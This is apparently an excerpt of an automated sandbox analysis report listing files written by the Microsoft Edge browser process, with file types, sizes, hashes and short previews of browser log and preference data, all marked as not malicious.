                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.224069763155392
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Xfh9+q2P923oH+TcwtzjqEKj0QMxIFUt8qkFkJZmw+qy9VkwO923oH+TcwtzjqEr:J4v4YebvqBZFUt8VyJ/+xD5LYebvqBaJ
                                                                                                                                                                                                                                                                                                  MD5:8E211CF8CE7D9584853A2422C3DAB866
                                                                                                                                                                                                                                                                                                  SHA1:2BCF6FB935D3F9BFA0AB64082FD4EDDB357C3304
                                                                                                                                                                                                                                                                                                  SHA-256:53FD71B289CC46D8B977523E8689C790F80A89C8C5E034C98570A4563F246338
                                                                                                                                                                                                                                                                                                  SHA-512:6EE659EBF5B9F4AB28F52EFCDDC423C753D9E10EF324A6A1DF6062CBB35D4530CF12AF28BC434D4DEABE3523A9E804E52C2E003CD370209CD2C669A68EECBDB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:40.789 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:24:40.790 1db8 Recovering log #3.2024/12/23-00:24:40.793 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):325
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0519654205849305
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D3+q2P923oH+TcwtpIFUt80M2WZmw+0M9VkwO923oH+Tcwta/WLJ:D3+v4YebmFUt80/W/+0aV5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:C31F1783998169980E0E1F4A52130F6F
                                                                                                                                                                                                                                                                                                  SHA1:045B1FECE4DF21673D821A062BD46BC2A299AA84
                                                                                                                                                                                                                                                                                                  SHA-256:93789456437238A149E41986E17049F078CD3F4A3BF1632EE9B322EA18606296
                                                                                                                                                                                                                                                                                                  SHA-512:3B94C83523F0825F4CFAA96AEB99CC965651C443709B8AF5AD8B1CE64061C8024847DA48EF5BE82E30E6EC2B8CAA0D18EC28C5279F5A94581E0853975B484A77
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.013 aec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:24:20.014 aec Recovering log #3.2024/12/23-00:24:20.014 aec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651197155152976
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVuma:Bq+n0Jz9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                                                  MD5:189E622A20539385406A4E2B93D77FEA
                                                                                                                                                                                                                                                                                                  SHA1:C767A9909D2B01EEEC30C661953446F81989C53E
                                                                                                                                                                                                                                                                                                  SHA-256:073F92A88850AA2C355B28011592202C2CD367D99CB152BCB31A0D4FD361D458
                                                                                                                                                                                                                                                                                                  SHA-512:9F975FFBC2A834D827D7F46CA0863ABB9A785D639C47BD56BE8072B958FD365DF78EA1F9DB649A96C8F65A0FA4E844E41169E00909C31D17625889DF44FD1C3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4669319635417868
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0fCn:v7doKsKuKZKlZNmu46yjx0fu
                                                                                                                                                                                                                                                                                                  MD5:F83F68BD3B7EEB4FBA0FE0FEC1E8C23C
                                                                                                                                                                                                                                                                                                  SHA1:B13A58CE9B3A79F24E31927D4AC288FA3F5F3A6F
                                                                                                                                                                                                                                                                                                  SHA-256:135932E2A78A644BA6DC724352E5076D9AE9B8C3B75691EC3F4F9A42660FE838
                                                                                                                                                                                                                                                                                                  SHA-512:EDF7368601D172B24409913827D57B87FC99824ACE5676C6418BABCB09B72286C5C77CA2965B552D16DEA3C2C8221D2EF263FD74366535B28B446C728F3004F9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.13766033093567093
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MNllv/etXlfEzj234//l/h4jRfn1d7jdtQfZlH9yczjSsXtXlfyczx:9lczK4puj3dndcl0czxl6czx
                                                                                                                                                                                                                                                                                                  MD5:84B2BAB2BF9BEC8E0F511FDF52132E06
                                                                                                                                                                                                                                                                                                  SHA1:0A3B25AEFAFE1FD7AD87BB737D91F1F4CF835DA7
                                                                                                                                                                                                                                                                                                  SHA-256:3CE6F18B13617126329B8C9CEAE5FC1F90E2C0E4B825DAB06BDFAB25A16C41D0
                                                                                                                                                                                                                                                                                                  SHA-512:12FB56EBF7489667CD8D372317EC81433242CB90FCE95E4E0F6181699F584DD3584EE923FAC230A835770A21E9070B8A63528B2407194FDDE855604BCA50E4F4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40503
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561510525674463
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WUxl/V7pLGLh2YWPrXf0d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCHgXWKsrws6jxd:WUxl/jch2YWPrXf0du1jafHgmKFs6jy6
                                                                                                                                                                                                                                                                                                  MD5:01D61B6FAA23A5A689AD9EF7294B57E8
                                                                                                                                                                                                                                                                                                  SHA1:6B8A4F8A03DD35E8731B076E05CA2F4F38BD6497
                                                                                                                                                                                                                                                                                                  SHA-256:BCD0D946855FA5AF58E045A08C9F99D4A1C738FF2FB57260685A643E3D80D0F7
                                                                                                                                                                                                                                                                                                  SHA-512:DDBDD9E5D059D55BB1FD75F3B31FB1EA85B1F994DC2510AB24B40289E965365157608CF0C6BEC5C454C71E6C276A3BA4FF0C454065D4A915F83AC2CEC94A96D8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.10257948433074167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Gu0QS10L0QS1s/589XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/c:+xGspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                                  MD5:F51F935817943B5896D162B9C9245855
                                                                                                                                                                                                                                                                                                  SHA1:971891689BAB15E371377A9CC04911C834584ED9
                                                                                                                                                                                                                                                                                                  SHA-256:AA87E6C487CAB8B4BB25ADAAD97835F8077C9CD76842A458C388CBD8253DF399
                                                                                                                                                                                                                                                                                                  SHA-512:B7D99CABEDDE823F08C9A76E3152C7D77F2846A09B9015CF7A6AD612FAA13804378AB2EA46B82B2CB22C35788666611DBE749F5583379FC4A4C6F5C3A54355C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):317272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8904336041213913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:G2DLRIRM4oMHtMDtMM8+qM0hIM1SgMlGnMgNS1eMkWv81yNyMKyTyxiy4xy7w:KY619AwnLaF
                                                                                                                                                                                                                                                                                                  MD5:B0D10A6C7B14F90DA597C1186419DDD6
                                                                                                                                                                                                                                                                                                  SHA1:2BA9ED1944FFB083D5CA4A859FA28B3C67B7C0E2
                                                                                                                                                                                                                                                                                                  SHA-256:0CB0D6007900D2ACE05F1E72E292307603B1F8263C8B5A85E751B59535057C82
                                                                                                                                                                                                                                                                                                  SHA-512:6FCF9B423A78FF03943E31023D3724DDECFFA30CA9438CF947DF84DCAC45769ED93ABC1A06735DDF284964080EFF14B845CB66363DDD9417F676C835C6B457C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):628
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2378975358599957
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuGe8Q:iDOE
                                                                                                                                                                                                                                                                                                  MD5:9995305AD34C48B5635D1362974E61CC
                                                                                                                                                                                                                                                                                                  SHA1:469135E21F63DB5F07645B7FC0D06306386753EA
                                                                                                                                                                                                                                                                                                  SHA-256:BFF44ED12E4B336F6E90E3E51687EB37B02787F503B89B14398ACFB3D257FE7C
                                                                                                                                                                                                                                                                                                  SHA-512:A267782C728F3F0AE9B6CA9652954D308123FCF3F82541E78C6F903B879FAA7B447328FAC13E665648002B06AA25AC1BC429C9584AB7FA4192015CBF2C31E3CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147496867778144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:eq2P923oH+TcwtfrK+IFUt8wZmw+4kwO923oH+TcwtfrUeLJ:ev4Yeb23FUt8w/+45LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:E4A9E7761F464CCEF5E4914B786C1ABC
                                                                                                                                                                                                                                                                                                  SHA1:76A0890246E1969F643D2FD160A6942D3FAEDEB7
                                                                                                                                                                                                                                                                                                  SHA-256:2F670EA21A393E11F150E531E5F49FD53AABD8857FBA1D3054BE0216F9AE9307
                                                                                                                                                                                                                                                                                                  SHA-512:C4D5D53E19425D1D4954D4FA8A97F7000619A973BAE1FF97B136B06A30F1F19ABAD94FD0AB31AE7DDC6D5C01ACBC37B2B52BB29062D669A291BD183306A61C69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.479 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:24:20.480 1c34 Recovering log #3.2024/12/23-00:24:20.480 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147496867778144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:eq2P923oH+TcwtfrK+IFUt8wZmw+4kwO923oH+TcwtfrUeLJ:ev4Yeb23FUt8w/+45LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:E4A9E7761F464CCEF5E4914B786C1ABC
                                                                                                                                                                                                                                                                                                  SHA1:76A0890246E1969F643D2FD160A6942D3FAEDEB7
                                                                                                                                                                                                                                                                                                  SHA-256:2F670EA21A393E11F150E531E5F49FD53AABD8857FBA1D3054BE0216F9AE9307
                                                                                                                                                                                                                                                                                                  SHA-512:C4D5D53E19425D1D4954D4FA8A97F7000619A973BAE1FF97B136B06A30F1F19ABAD94FD0AB31AE7DDC6D5C01ACBC37B2B52BB29062D669A291BD183306A61C69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.479 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:24:20.480 1c34 Recovering log #3.2024/12/23-00:24:20.480 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                  MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                  SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                  SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                  SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):342
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.122225585429704
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:rIq2P923oH+TcwtfrzAdIFUt8F9Zmw+FPkwO923oH+TcwtfrzILJ:rIv4Yeb9FUt8F9/+FP5LYeb2J
                                                                                                                                                                                                                                                                                                  MD5:01C36B30A2848EACFBB7001AAA6BB81B
                                                                                                                                                                                                                                                                                                  SHA1:69B4A9F10D92FD1152CCF1ED66BCBCECB31C2AB6
                                                                                                                                                                                                                                                                                                  SHA-256:5FA766D648ABCE401E5361F07AF5CBAB3AFDAB7B72E529E19D25C15252E8F02E
                                                                                                                                                                                                                                                                                                  SHA-512:686B7977E21B653CB69C9BD281AC8467601266131988DAABB85489ACB58A92B66AFD14610E4B8CAEBB93459B495AF83CBE29B6ACDFFF7BE3271DF7C8585B53E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.473 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:24:20.474 1c34 Recovering log #3.2024/12/23-00:24:20.474 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
